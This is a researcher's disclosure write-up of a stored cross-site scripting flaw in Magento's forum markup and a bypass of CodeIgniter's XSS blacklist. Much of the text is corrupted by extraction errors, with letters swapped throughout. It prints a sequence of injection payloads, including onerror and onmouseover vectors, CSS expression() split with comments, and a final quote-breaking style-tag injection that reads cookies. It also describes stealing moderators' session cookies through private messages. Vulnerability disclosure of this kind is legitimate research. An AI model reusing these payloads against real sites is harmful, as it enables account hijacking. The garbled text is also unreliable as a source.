Stylish XSS in Magento: When `style` helps you

How to bypass CodeIgniter in a Real World Setting?

by
Ashar a!ed
https:""twitter#$o%"soa&'(()ashar
Normally I do not write about XSS findings in the form of a write-up (I always prefer tweet) unless
it is interesting (e.g., http://www.sribd.om/do/!""#$!%&$/Stored-XSS-in-'witter-'ranslation),
funny (e.g., http://issuu.om/msashar(a)ed/dos/urlwriteup) or worth sharing (e.g.,
http://www.sribd.om/do/!"*"!"+"!/XSS-is-not-going-anywhere). 'his XSS in ,agento is
interesting, funny and worth sharing. -urther, this XSS is not about alert or money. It is about
passion and lo)e. -urthermore, this story shows you how to bypass .CodeIgniter/ --- one of the
most popular 010-based web appliation framewor2 in a real world setting or this is a real world
3'-. Some of my XSS findings are a)ailable in the presentation (http://slid.es/msashar(a)ed/ross-
site-sripting-my-lo)e) that I had gi)en at 4S5 6urope !*"# as a part of 785S0 Seminar. ,a2e
sure to press the downward arrow (*) for eah XSS e9amples: e9plaination.
,agento 3ommere (https://www.magentoommere.om) --- an ebay inc $o%pany, is one of the
leading pro)iders of eommere-based solutions. ,agento had announed a bug bounty program:
(http://magento.om/seurity) few months ago. ,agento allows following set of mar2-ups (shown
in -igure gi)en below) if you wish to post a ;uestion on forums
(http://www.magentoommere.om/boards/newtopi/) or wish to reply someone:s post
(http://www.magentoommere.om/boards/newreply/), want to send a pri)ate message to members
of forums (http://www.magentoommere.om/boards/member/messages/pm/) and feature is also
a)ailable as a part of forum:s signature
(https://www.magentoommere.om/produts/ustomer/aount/editsignature/). ,agento is also
using this mar2-up feature on its subdomains li2e: http://enterprise.magento.om/ and
http://go.magento.om/. In short this feature is e)erywhere on the site.
,agento:s mar2-up or rih te9t or 8<SI8<= feature is pretty restrited and only allows few
harmless tags i.e., bold, itali, underline, ;uote, ode, mailto and anhor tag. 5t the same time, user
an also set .si+e/ and .$olor/ properties of the abo)e mentioned tags, as a part of style attribute.
Now lets desribe how these tags wor2 in a normal manner: 'he following input mentioned in the
left olumn will result in ...
>b?>si@eA+?>olorAblue?bold>/si@e?>/olor?>/b?
>i?itali>/i?
>u?underline>/u?
>;uote?;uote>/;uote?
>ode?ode>/ode?
>emailA(ustasharBhotmail.om?reah me>/email?
>urlAhttp://www.bbnews.om?'op Stories>/url?
I try to brea2 down the abo)e input into parts e.g., >b?>si@eA+?>olorAblue?bold>/si@e?>/olor?>/b? is
internally treated as:
,b-,span style./0ont1si+e:'(p23/-,span style./$olor:blue3/-bold,"span-,"span-,"b-
4ui$5 6est
1111111111111
5s a part of ;ui2 test, I initially tried the most ommon XSS )etor: i.e.,
CDEimg srA9 onerrorAprompt(")FD and site has on)erted this atta2 )etor into:
>xonerror=prompt(1);
5NG as a part of seond try, I used the following XSS )etor (I wanted to see 1',Hi beause it
seems XSS was not wor2ing)
:CDDEmar;ueeDEimg srA9 onerrorAonfirm(doument.oo2ie)DE/mar;ueeDCDE/plainte9tIDE/J
IDEplainte9t/onmouseo)erAprompt(")DCDEsriptDalert(doument.domain)
E/sriptDBgmail.omEisinde9 formationA(a)asript:alert(/XSS/) typeAsubmitD:--
DCDE/sriptDEsriptDalert(")E/sriptDCDEimg/idAConfirmKlparF"KL9!MFC/altAC/CsrAChttp://www.i
eee-seurity.org/images/new-web/'ro(anN1orse.(pgConmouseo)erAe)al(idKL9!MFD:CDEimg
srAChttp://bryanhallsawa2ening.files.wordpress.om/!*"#/*M/anonymousbigbrotherlo
ne.(pgC/ onmouso)erAalert(")DEsript/K'abF srA:https://dl.dropbo9.om/u/"#*"%*&%/(s.(s:
/K'abFDE/sriptD
and it has been on)erted into:
>><marquee>x
onerror=confirm([removed])<marquee>!><plaintext"><#"><plaintextonmou$eover=promp
t(1)>!>alert(document.domain)%&mail.com<i$index formaction=[removed]alert('(()
type=$u)mit>*++ >!>alert(1)!><im&id=!confirm(1)!alt=!!$rc=!,ttp-....ieee+
$ecurity.or&ima&e$ne.+
.e)/ro0an12or$e.0p&!onmou$eover=eval(id)>>,ttp-)ryan,all$a.a3enin&.file$..ordpre$$.com
451657anonymou$)i&)rot,erclone.0p&
In short the abo)e )etor also does not wor2 but if you notied the underlined stuff (i.e., 7re%o!ed8)
in the on)erted )etor, it shows that the site is using CodeIgniter O 5 popular 010-based web
appliation framewor2. 6)er wondered how 3odeIgniter wor2s for XSS mitigation, I would li2e to
refer you to: https://github.om/6llisHab/3odeIgniter/blob/de)elop/system/ore/Seurity.phpLH"!%
5s part of 3odeIgniter:s feature: it simply tries to loo2 for some bla2-listed words li2e
.doument.oo2ie/, .(a)asript/ et and then try to hange these words into 7re%o!ed8 and the goal
is to mitigate the affet of Pa)aSript. If you would li2e to see what I already did with 3odeIgniter
(bypassed se)eral times), please see: https://github.om/6llisHab/3odeIgniter/issues/!$$Q. 4afay
(https://twitter.om/rafaybaloh) and ,athias (https://twitter.om/a)lidienbrunn) also partiipated in
this bug report and found bypasses.
'he summary so far is the most ommonly used XSS atta2 )etor and the )etor that I often used,
do not wor2 R At this point, I am pretty sure most of the respected bug bounty hunters and
f**king automation tools stop at this point and will start looking for other low hanging fruits
:) This X is out of scope for any automation tools out there
8ut for me it 9(ound$ :,allen&in& ; $o
More 6esting
111111111111111
Hets try .on%ouseo!er/ or .on%ouse%o!e/ et stuff in the allowed mar2-ups and see what
happens. e.g.,
>b/onmouseo)erAalert(")?>si@eA+?>olorAblue?bold>/si@e?>/olor?>/b?
5NG/74
>b onmouseo)erAalert(")?>si@eA+?>olorAblue?bold>/si@e?>/olor?>/b?
Soth abo)e mentioned )ariations also do not wor2 and internally site treat them as:
7utput loo2s li2e:
If you remembered, one of the allowed mar2-up is an anhor i.e., ,a- tag (i.e.,
>urlAhttp://www.bbnews.om?'op Stories>/url?). 'he immediate thought ame to my mind was: I
should try XSS )ia a!as$ript (i.e., (a)asript:alert(")) and/or data 9RI (i.e.,
data:te9t/htmlFbase$+,01N!TyM)bm9)<8UM<89lnUo,i2V)R
Hets input R
>urlA(a)asript:alert(")?'op Stories>/url?
5NG/74
>urlAdata:te9t/htmlFbase$+,01N!TyM)bm9)<8UM<89lnUo,i2V?'op Stories>/url?
'he abo)e two forms of in(etions also do not wor2 and internally site treats them as:
If you loo2 losely at the abo)e figure, you will see http:"" has been appended before Pa)asript and
data W4I R whih ma2es them WS6H6SS. 5t the same time, again 3odeIgniter omes into ation
and on)erts .&a!as$ript/ word into the string .7re%o!ed8/ in the first )ariation.
'he ne9t thing, I tried is:
>urlA(aK'abF)asK'abFript:alertKlparF"KrparF?'op Stories>/url?
and the sole purpose is to defeat 3odeIgniter:s bla2-listed term .&a!as$ript/ with the help of
1',H& entities. Sut ,agento on)erts the abo)e in(etion into (K is on)erted into respeti)e
entity i.e., KampF):
Ea hrefAChttp://(aKampF'ab)asKampF'abript:alertKampFlpar"KampFrparC targetACNblan2CD'op
StoriesE/aD
At this point of time, I am in need of a !cup of tea" so !Tea Time" :#)
5s soon as I finished a .cup of tea/, an immediate thought ame to my mind that I should try XSS
)ia .style/ attribute (that:s why Stylish XSS :)). 0lease 2eep in mind the abo)e mentioned allowed
proedure of setting a .style/ on allowed mar2-ups: 'he following input
>b?>si@eA+?>olorAblue?bold>/si@e?>/olor?>/b?
is treated internally as:

,b-,span style./0ont1si+e:'(p23/-,span style./$olor:blue3/-bold,"span-,"span-,"b-
It means, if we speify a style, then site dynamially generates a ,span- tag along with .style/
attribute and assign the )alue of mentioned si@e and gi)en olor to it.
'he initial goal I ha)e in my mind is to e9eute Pa)asript )ia 3SS 69pressions i.e.,
2:e2pression:alert:';; or width:e2pression:alert:';;. 'he Pa)asript e9eution )ia 3SS
e9pressions (in old I6 browsers) has been 2nown sine ages and has been already disussed in
http://sla.2ers.org/forum/inde9.php and
https://www.owasp.org/inde9.php/XSSN(3rossNSiteNSripting)N0re)entionN3heatNSheet
So as a part of ne9t step, I tried R
>b?>si@eA+?>olorAwidth:e9pression(alert("))?bold>/si@e?>/olor?>/b?
whih beomes:
5gain 3odeIgniter omes into ation (see figure abo)e) and has remo)ed the bla2-listed word i.e.,
.e2pression/. In order to defeat bla2-listed word .e2pression/, a 2nown tehni;ue has also been
disussed at http://sla.2ers.org/forum/inde9.php and the tehni;ue is: .e2pre"<<"ssion/ i.e., use of
multi-line omments inside the word .e2pression/ and I6Q simply ignores /XX/ and Pa)asript )ia
3SS e9pression gets e9euted. So lets hange the )etor that will use .e2pre"<<"ssion/.
>b?>si@eA+?>olorAwidth:e9pre/XX/ssion(alert("))?bold>/si@e?>/olor?>/b?
So it seems, with the help of /XX/, the abo)e in(etion bypasses 3odeIgniter:s bla2-listed word
.e2pression/ and it loo2s li2e:
SW' still Pa)asript does not gets e9euted in I6Q and the reason is: .$olor/ 3SS property. In 3SS,
the standard way to assign a )alue to a property is:

CSS=roperty>a%e: ?alue
In abo)e ase (see figure abo)e), browser onsiders .width/ as a )alue of .$olor/ property whih is
basially nothing and .width:e2pre"<<"ssion/ ne)er gets e9euted. 'he following is the sreen-shot
of soure ode in I6Q browser:
6he proble% in hand is $%& T% '(T )I* %+ .$olor/ property so that I an use
.width:e2pre"<<"ssion:alert:';;/ (width as property name and e9pression as its )alue). 'he site:s
user-interfae only allows .olor/ and .si@e/ properties. 7ne more thing that you may ha)e notied
in the abo)e sreen-shot is alert(") beomes alert@A)B3'@A)'3 . 'his shows 3odeIgniter again
omes into ation :)
3odeIgniter on)erts bla2-listed 2eyword .alert:';/, if found in input, but this time instead of
using .7re%o!ed8/, 3odeIgniter only on)erts ( and ) into respeti)e deimal enoded form. I thin2
this is the implementation flaw of 3odeIgniter beause e)en if ( and ) are on)erted into deimal
entities, they will still wor2 in Pa)asript onte9t (later you will see a sreen-shot)R 74 as an
alternate way or proof of onept, you an simply use .$on0ir%/ or .pro%pt/ R
<n real life attac3 $cenario= attac3er doe$ not need alert= confirm or prompt ; -+)
5t this time, a weird idea omes to my mind and the idea is: &$AT &I,, $A--(. I+ I &I,,
/( !T0,(" TA' i1e1, 7style8###7"style8 2in the allowed mark#up synta3)4 6he reason is: site is
allowing style attributeC %ay be it will allow style tag also or %ay be de!elopers will do a
%ista5e in i%ple%entation and will not di00erentiate style attribute and style tag :1;
So I deided to input the following:
>b?>styleAwidth:e9pre/XX/ssion(alert("))?bold>/style?>/b?
and it beomes:
,span $lass./width:e2pre"<<"ssion:alert:';;/-bold,"span-
It means that this time, ,agento has generated a ,span- tag but without .style/ attribute. Instead
of dynamially generating the .style/ attribute, ,agento has reated a .$lass/ attribute. 7ne thing,
we already 2now: .style/ attribute is allowed but pre)iously it wor2ed only with .si+e/ and .$olor/
properties.
As a part of ne3t step, what will happen if I will use 5style6 tag 2i1e, 7style879style8) along with
!style" attribute4
Now our abo)e in(etion beomes:
>b?>styleAstyleAwidth:e9pre/XX/ssion(alert("))?bold>/style?>/b?
and the site on)erts the abo)e in(etion into:
,span $lass./style.width:e2pre"<<"ssion:alert:';;/-bold,"span-
Wnfortunately this again does not wor2 beause browser treats styleAwidth:e9pre/XX/ssion(alert("))
as a )alue of .$lass/ attribute SW' the good thing is that I had now =6' 4IG 7- .$olor/ property
and the only thing left is 6D ERFAG D96 DH 6HF A66RIE96F CD>6FX6 i.e., in this ase
.$lass/ attribute.
Now we only need ID9EJF 49D6FS at first sightR :-)
So new in(etion now loo2s li2e:
>b?>styleACstyleAwidth:e9pre/XX/ssion(alert("))?bold>/style?>/b?
and this time, ,agento has on)erted the abo)e in(etion into:
Espan lassACC styleACwidth:e9pre/XX/ssion(alert("))K;uotFCDboldE/spanD
'hough we ha)e (umped out from the attribute onte9t but still we need the )alue of .style/
attribute that loo2s li2e: style./width:e2pre"<<"ssion:alert:';;/ in order to get Pa)asript e9euted
)ia 3SS e9pressions.
If you loo2 losely, site automatially inserts ending/losing / :double Kuotes; in order to properly
lose the attribute )alue.
-inally our in(etion is:
>b?>styleACstyleAwidth:e9pre/XX/ssion(alert(")) (un2te9t?bold>/style?>/b?
and this time ,agento beha)es li2e a good hild:
Espan lassACC styleACwidth:e9pre/XX/ssion(alert("))C (un2te9tCACCDboldE/spanD
So now all set for an XSS in I6Q R
Sut after XSSed, following ;uestions ame to my mind R
I IT (.%/'$ T% $A:( A. X T$AT %.,0 &%); I. I(<4
&$% =A)( A>%/T X T$AT &I,, %.,0 &%); I. I(<4
=A. I =%.:()T T$I X I.T% A. X T$AT &%); I. ?%*(). >)%&()4
Jets Io It
If you remembered orretly, as soon as we ha)e in(eted >style?>/style? mar2-up, ,agento has
dynamially reated a .$lass/ attribute. e.g.,
>b?>styleA?bold>/style?>/b?
has been on)erted into:
,span $lass.//-bold,"span-
It means, now we an try .on%ouseo!er/ stuff along with .style/ tag and this should wor2 R
So our -IN5H in(etion that wor2s in latest 3hrome browser will be now loo2s li2e:
7b87style./on%ouseo!er./alert:$oo5ie;38bold7"style87"b8
'he first C will brea2 out from the attribute onte9t while seond C will hold alert(oo2ie) in the
following manner: Calert(oo2ie)C. 'he abo)e in(etion has been on)erted into ...
Espan lassACC onmouseo)erACalert(oo2ie)FCDboldE/spanD
Here is the s$reen1shot o0 the $ode in Chro%e:

7ne thing you may ha)e notied that I ha)e used .$oo5ie/ instead of .do$u%ent#$oo5ie/. 'he
reason is 3odeIgniter beause it remo)ed .do$u%ent#$oo5ie/, if found in input string R
SW' 817 N66GS a .do$u%ent#$oo5ie/ when one an use .$oo5ie/ or on the following W4H,
you will find !* plus uni;ue ways of aessing a oo2ie R
http://pastie.org/pri)ate/n2ryfy+Ml"oy%h)blhM*;
If you will use .do$u%ent#$oo5ie/, then in(etion loo2s li2es the following and does not wor2:
Now its time to see XSS in latest 3hrome and another up of tea R. :-)
5nother thing, I ha)e notied is that .=H=SFSSII/ oo2ie is not httponly#
It means, an atta2er an easily steal the session oo2ie of HDR9M MDIFRA6DRS or ,agento:s
team member by simply sending a 04IY5'6 ,6SS5=6. In order to see who is moderating the
forums, on the following W4H: http://www.magentoommere.om/boards/, if you will sroll down
the page, the page shows list of ati)e members and the usernames of moderators ha)e been
highlighted e.g.,
http://www.magentoommere.om/boards/member/#%!%M$/
http://www.magentoommere.om/boards/member/"$##"%/
http://www.magentoommere.om/boards/member/"#MM*Q/
'his type of atta2 (i.e., stealing session oo2ies )ia XSS on forums) has already been used
suessfully in ase of Wbuntu -orums (http://blog.anonial.om/!*"#/*Q/#*/ubuntu-forums-are-
ba2-up-and-a-post-mortem/) and 5pple de)elopers forums
(http://mytehblog.om/other/apple/apple-de)eloper-website-ha2ed-what-happened/ ) ...
'his XSS has been fi9ed and it too2 ,agento three and half months for the fi9. 5s a part of an
e9erise you guys may try to brea2 the fi9 :) 0lease let me 2now your feedba2 on this R
Hu2ily one an still see this XSS li)e here (old post is still there and they forgot to delete it):
http://www.magentoommere.om/boards/)iewthread/%QQ&$$/ 7ne you will open this W4H,
please .Io not bring your %ouse o!er the word bold/ F-)